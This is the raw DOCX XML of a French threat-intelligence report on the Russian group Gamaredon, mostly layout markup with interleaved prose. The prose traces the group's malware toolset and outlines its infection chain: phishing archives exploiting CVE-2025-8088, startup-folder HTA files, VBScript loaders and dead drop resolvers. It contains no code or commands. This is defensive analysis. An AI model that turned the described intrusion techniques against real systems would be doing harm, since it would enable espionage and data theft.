            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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manière exhaustive l’ensemble de la chaîne d’exécution et les nouvelles méthodologies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6047763</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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déployées par le groupe en 2026, en comparant les conclusions de Sekoia aux informations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6221118</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2504196" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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419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issues des sources ouvertes existantes.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8534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" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2275840</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4941567</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3008630" cy="2760980"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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-22" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3008630" cy="27609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08630" h="2760980">
                          <a:moveTo>
                            <a:pt x="0" y="2760980"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3008630" y="2760980"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3008630" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="276098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930946</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1503324" cy="321282"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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3324" cy="32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2</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle21"/>
                            <w:spacing w:val="6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Contexte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1390682</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5188805" cy="262867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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88805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2"/>
                          </w:rPr>
                          <w:t xml:space="preserve">2.1Gamaredon : un acteur cyber étatique russe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1794533</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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Gamaredon, également connu sous les noms ACTINUM, Armageddon, UAC-0010 ou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1967888</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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BlueAlpha, est un groupe de cybermenaces parrainé par l’État russe. Selon le Service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2141243</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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sécurité ukrainien (SSU), il est officiellement lié au FSB (Service fédéral de sécurité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2314598</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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Fédération de Russie). Ce groupe cible principalement l’Ukraine, en visant des entités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2487953</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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gouvernementales, militaires et des infrastructures critiques. Son objectif principal reste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2661308</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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cyberespionnage, avec une stratégie axée sur l’établissement d’un accès persistant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2834663</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2822013" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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20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exfiltrer en continu des documents sensibles.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3091212</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3105500" cy="262867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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5500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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">2.2Evolution de son arsenal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3495063</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5108706" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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87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2.2.1.1</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle23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2013–2021 : Des outils prêts à l’emploi à un framework personnalisé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3770018</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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Entre 2013 et 2021, Gamaredon a progressivement affiné ses méthodes, passant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3943373</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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l’utilisation de malwares génériques achetés au détail à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framework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sur mesure.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4116728</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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Initialement, le groupe menait des campagnes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spearphishing</w:t>
                        </w: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 en exploitant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4290083</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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documents leurres volés, imitant des institutions ukrainiennes. Ces attaques déployaient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4463438</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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chaînes d’exécution complexes pour installer des outils comme le RAT Remote Manipulator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4636793</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4644819" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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481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System (RMS) ou UltraVNC, largement disponibles sur les forums russes.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0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2470150</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7679075</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2658830" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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883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 – Interface du Remote Manipulator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7931808</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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À partir de 2016, Gamaredon a adopté Pteranodon (ou Pterodo), une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backdoor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8105163</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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personnalisée permettant de charger des modules supplémentaires, d’exécuter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8278518</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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commandes à distance, de voler des fichiers ou de réaliser des captures d’écran. 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8451873</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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framework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, dont certaines parties du code ont été rendues publiques dès 2016 sur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8625228</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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forums russes et GitHub, selon un rapport du SSU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10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en 2021, a marqué une étape clé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8798583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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professionnalisation de ses outils. Le rapport de Palo Alto Networks (2016)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11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confirme son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8971938</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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utilisation massive, notamment via des vagues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spearphishing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et des modules spécialisés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9145293</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2884180" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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41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(ex. : voleurs de fichiers ou de données USB).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1147609" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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760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10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  <w:u w:val="single"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> https://ssu.gov.ua/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4154461" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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5446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11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https://unit42.paloaltonetworks.com/gamaredon-group-toolset-evolution/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314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8544569</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1828800" cy="6350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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4457005" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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570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2.2.1.2</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle23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2021–2025 : Fragmentation et spécialisation des malwares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1235733</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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À partir de 2021, Gamaredon a abandonné progressivement Pteranodon au profit d’une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5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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approche modulaire, où chaque composant remplit une fonction spécifique. Les chercheurs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2868673" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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6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ont identifié des familles autonomes, comme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1857398</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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PowerPunch (loader) et QuietSieve (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stealers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), classés par le Microsoft Threat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2030753</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2477488" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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74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Intelligence Center (MSTIC)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12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en 2022.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2204108</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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GammaLoad (loader + ver) et GammaSteel (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) documentés par CERT-UA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13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2377463</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5384683" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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46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2022 (rapports #3787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14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et #5134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15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) et analysés par Check Point Research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16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en 2023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2550818</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1913265" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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26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qui nomma le ver LitterDrifter.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2724173</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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GamaWiper,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wiper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identifié par ClearSky Cyber Security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17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en décembre 2025,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2897528</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2612463" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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24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utilisé contre des chercheurs en sécurité.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3159783</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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Pendant cette période, les analyses d’ESET, Recorded Future, IBM X-Force et HarfangLab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3333138</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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ont mis en lumière des dizaines de variantes, mais la diversité des noms a rendu leur suivi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3506493</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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complexe. Seul le rapport du RNBO (Conseil de sécurité nationale et de défense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3679848</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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l'Ukraine)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18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 relatant l'activité de Gamaredon dans le contexte de la contre-offensive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3853203</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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ukrainienne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19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en 2023 a catégorisé l'arsenal de Gamaredon en trois parties : GammaDrop,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4026558</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2045840" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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58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GammaLoad, and GammaSteel.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4301513</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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Cette période marque un tournant stratégique, marquant l'abandon d'une architecture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4474868</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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monolithique au profit d'une approche hautement modulaire, dans laquelle plusieurs charges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4648223</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5610743" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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07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utiles autonomes sont déployées à la suite de la compromission initiale par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spearphishing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4923178</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4300681" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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06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2.2.1.3</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle23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2026 : Une taxonomie unifiée pour un arsenal modulaire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5198133</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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 2026, malgré l’évolution des techniques d’évasion et des langages de programmation,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5371488</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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objectifs de Gamaredon restent inchangés : cyberespionnage et exfiltration de données.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5544843</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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Pour clarifier son arsenal, une taxonomie standardisée a été adoptée, inspirée de celle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5718198</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5229705" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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97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CERT-UA, avec le préfixe « Gamma » suivant de la fonction principale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malware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5993153</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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GammaPhish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: Chaîne complète depuis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phishing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initial jusqu’au déploiement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12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6166508</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4172353" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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23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GammaLoad (précédemment nommés GammaDrop ou PteroDoc)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6339863</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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GammaLoad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 : Composants intermédiaires dédiés au déploiement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payloads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6513218</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2674769" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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47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supplémentaires (englobant PowerPunch)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6686573</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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GammaWorm</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="18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: Vers propagateurs (englobant LitterDrifter, PteroLNK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6859928</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="935923" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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9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PterodoUSB).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7033283</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565658" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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6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GammaSteel</w:t>
                        </w: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 : Modules pour le vol vol de données (englobant QuietSieve,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26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7206638</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3908739" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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873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USBStealer, HarvesterX et quelques modules de Pteranodon)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7379993</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565658" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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6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GammaWipe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: Codes malveillants conçus pour effacer le système (aussi nommé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31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7553348</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="865794" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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57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GamaWiper)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8582682</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2664116" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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411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12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https://www.microsoft.com/en-us/wdsi/threats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8728732</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1161452" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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145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13</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle20"/>
                            <w:spacing w:val="-6"/>
                            <w:u w:val="single"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> https://cert.gov.ua/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8874782</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1817829" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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782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14</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle20"/>
                            <w:spacing w:val="-4"/>
                            <w:u w:val="single"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> https://cert.gov.ua/article/3787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9020832</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1817829" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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782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15</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle20"/>
                            <w:spacing w:val="-4"/>
                            <w:u w:val="single"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> https://cert.gov.ua/article/5134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9166882</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1944661" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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466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16</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle20"/>
                            <w:spacing w:val="-4"/>
                            <w:u w:val="single"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> https://research.checkpoint.com/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9312932</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1782228" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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222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17</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle20"/>
                            <w:spacing w:val="-4"/>
                            <w:u w:val="single"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> https://www.clearskysec.com/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9458982</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1514258" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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425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18</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle20"/>
                            <w:spacing w:val="-5"/>
                            <w:u w:val="single"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> https://www.rnbo.gov.ua/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9616462</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4852961" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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296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19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https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/Gamaredon_activity.pdf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600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2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9081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4361824</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="2372359"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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23723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2372359">
                          <a:moveTo>
                            <a:pt x="0" y="1403350"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1403350"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2372359"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2372359"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1403350"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="434974"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="434974"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1403350"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1403350"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="434974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435609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="43560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  <a:moveTo>
                            <a:pt x="0" y="1403350"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1403350"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2372359"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2372359"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1403350"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="434974"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="434974"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1403350"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1403350"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="434974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435609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="43560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" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4010025</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2348239</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="772163" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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216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215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772159" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="77215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930946</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5751387" cy="321282"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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1387" cy="32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3</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle21"/>
                            <w:spacing w:val="3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1"/>
                            <w:spacing w:val="-1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Vue d'ensemble de la chaîne d'infection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1390682</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3398339" cy="262867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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8339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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">3.1Accès initial : GammaPhish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1794533</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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L’accès initial, baptisé GammaPhish, repose sur l’utilisation de fichiers xHTML malveillants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1967888</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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distribuant une archive RAR exploitant la vulnérabilité CVE-2025-8088. Cette faille permet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2141243</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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d’extraire discrètement un fichier HTA caché direc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tement dans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le répertoire de démarrage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2333213</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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Windows. Une fois exécuté, ce fichier HTA utilise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pour appeler une charge utile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2529863</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4243321" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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33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distante hébergée sur un serveur de commande et de contrôle (C2).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2786412</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5150786" cy="262867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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50786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</w:rPr>
                          <w:t xml:space="preserve">3.2Chargement et mise en place : GammaLoad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3190263</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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La phase de chargement initial, appelée GammaLoad, implique plusieurs chargeurs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3363618</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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VBScript récupérés sur les machines infectées. Ces chargeurs fonctionnent en cascade,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3536973</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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avec quatre étapes d’exécution distinctes observées. Leurs objectifs principaux consistent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3710328</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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collecter des informations sur le système hôte, mettre à jour la configuration réseau dans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3883683</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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registre à l’aide de </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle17"/>
                            <w:spacing w:val="2"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Dead Drop Resolvers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(DDR), et récupérer puis exécuter des charges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4057038</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3100715" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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07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utiles VBScript arbitraires depuis les serveurs C2.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4331993</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1300585" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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5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Notes de l’analyste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4606948</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2581324" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
